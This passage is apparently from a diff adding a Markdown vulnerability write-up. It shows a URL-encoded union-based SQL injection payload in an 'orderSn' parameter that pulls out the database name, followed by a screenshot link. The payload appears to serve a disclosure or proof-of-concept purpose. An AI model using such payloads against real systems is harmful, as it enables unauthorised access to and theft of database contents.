+orderSn=%27%29+UNION+ALL+SELECT+NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%28IFNULL%28CAST%28database%28%29+AS+NCHAR%29%2C0x20%29%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--+-
+```
+
+![image-20240917160329467](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409171603549.png)
\ No newline at end of file